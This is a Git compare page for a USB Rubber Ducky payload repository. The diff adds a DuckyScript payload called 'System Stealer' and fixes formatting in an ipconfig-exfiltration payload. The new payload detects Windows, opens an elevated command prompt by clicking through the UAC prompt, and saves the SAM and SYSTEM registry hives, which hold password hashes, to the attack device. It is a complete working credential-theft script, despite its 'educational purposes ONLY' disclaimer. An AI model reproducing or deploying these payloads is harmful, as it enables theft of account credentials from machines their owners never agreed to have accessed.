Compare commits

...

3 Commits

Author SHA1 Message Date
Mavis Coffey 251546c02d
Merge 083951025f into 675972662a 2024-10-18 14:44:01 -04:00
Mavis Coffey 083951025f
Added System-Stealer to exfiltration library 2024-10-18 14:43:32 -04:00
Mavis Coffey 1a5aa0bd08
Update payload.txt 2024-10-18 11:26:00 -04:00
2 changed files with 72 additions and 1 deletions

View File

@ -54,7 +54,8 @@ DELAY 500
GUI r GUI r
DELAY 300 DELAY 300
STRINGLN Powershell STRINGLN Powershell
DELAY 1000DEFINE #DRIVELABEL DUCKY DELAY 1000
DEFINE #DRIVELABEL DUCKY
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY WAIT_FOR_STORAGE_INACTIVITY

View File

@ -0,0 +1,70 @@
REM TITLE System Stealer
REM AUTHOR mavisinator30001
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
REM DISCLAIMER This is for educational purposes ONLY
DELAY 1000
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
IF ($_OS == WINDOWS) THEN
INJECT_MOD GUI R
DELAY 500
STRING cmd
DELAY 1000
CTRL-SHIFT-ENTER
DELAY 750
LEFT
ENTER
DELAY 1000
REM Change $DRIVELABEL to the storage label of your duck
DEFINE #DRIVELABEL D:
STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
STRINGLN reg save HKLM\system #DRIVELABEL/system.save
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY
ELSE
STOP_PAYLOAD
END_IF